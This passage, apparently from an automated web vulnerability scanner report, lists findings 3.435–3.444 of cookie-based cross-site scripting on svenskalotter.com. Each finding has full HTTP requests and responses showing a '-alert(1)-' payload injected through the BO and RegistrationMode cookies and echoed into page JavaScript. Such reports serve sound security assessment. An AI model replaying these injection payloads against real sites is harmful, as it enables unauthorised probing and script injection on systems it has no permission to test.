X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: BO=FM9c7ef"-alert(1)-"ff3f13efa1c; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42970


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM9c7ef"-alert(1)-"ff3f13efa1c";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.435. http://www.svenskalotter.com/ContactUsMail.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /ContactUsMail.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eba4"-alert(1)-"95b86ca0225 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM5eba4"-alert(1)-"95b86ca0225; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM5eba4"-alert(1)-"95b86ca0225; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42970


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM5eba4"-alert(1)-"95b86ca0225";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.436. http://www.svenskalotter.com/FairPlay.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /FairPlay.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbe0e"-alert(1)-"725dc4c31b8 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMbbe0e"-alert(1)-"725dc4c31b8; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: BO=FMbbe0e"-alert(1)-"725dc4c31b8; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37184


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMbbe0e"-alert(1)-"725dc4c31b8";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.437. http://www.svenskalotter.com/FairPlay.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /FairPlay.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62361"-alert(1)-"d85c95de549 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM62361"-alert(1)-"d85c95de549; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM62361"-alert(1)-"d85c95de549; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37184


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM62361"-alert(1)-"d85c95de549";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.438. http://www.svenskalotter.com/Help.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Help.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1cf0"-alert(1)-"b6fe61c9a03 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Help.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMb1cf0"-alert(1)-"b6fe61c9a03; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: BO=FMb1cf0"-alert(1)-"b6fe61c9a03; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMb1cf0"-alert(1)-"b6fe61c9a03";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.439. http://www.svenskalotter.com/Help.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Help.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe8c3"-alert(1)-"e44d0177189 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Help.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PMfe8c3"-alert(1)-"e44d0177189; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMfe8c3"-alert(1)-"e44d0177189; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMfe8c3"-alert(1)-"e44d0177189";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.440. http://www.svenskalotter.com/InviteFriend.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /InviteFriend.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bde2"-alert(1)-"2b88f66f761 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM3bde2"-alert(1)-"2b88f66f761; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: BO=FM3bde2"-alert(1)-"2b88f66f761; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47073


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM3bde2"-alert(1)-"2b88f66f761";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.441. http://www.svenskalotter.com/InviteFriend.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /InviteFriend.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bcc1"-alert(1)-"8c7f3bcf826 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM4bcc1"-alert(1)-"8c7f3bcf826; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM4bcc1"-alert(1)-"8c7f3bcf826; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:18 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:18 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:18 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:18 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:18 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47073


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM4bcc1"-alert(1)-"8c7f3bcf826";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.442. http://www.svenskalotter.com/PlayersClub.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /PlayersClub.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b012a"-alert(1)-"34350330c2c was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMb012a"-alert(1)-"34350330c2c; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: BO=FMb012a"-alert(1)-"34350330c2c; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41598


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMb012a"-alert(1)-"34350330c2c";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.443. http://www.svenskalotter.com/PlayersClub.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /PlayersClub.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef139"-alert(1)-"7f9238ea0e5 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PMef139"-alert(1)-"7f9238ea0e5; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMef139"-alert(1)-"7f9238ea0e5; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41598


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMef139"-alert(1)-"7f9238ea0e5";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.444. http://www.svenskalotter.com/Promotions.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Promotions.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dedde"-alert(1)-"ae918ea2a0e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

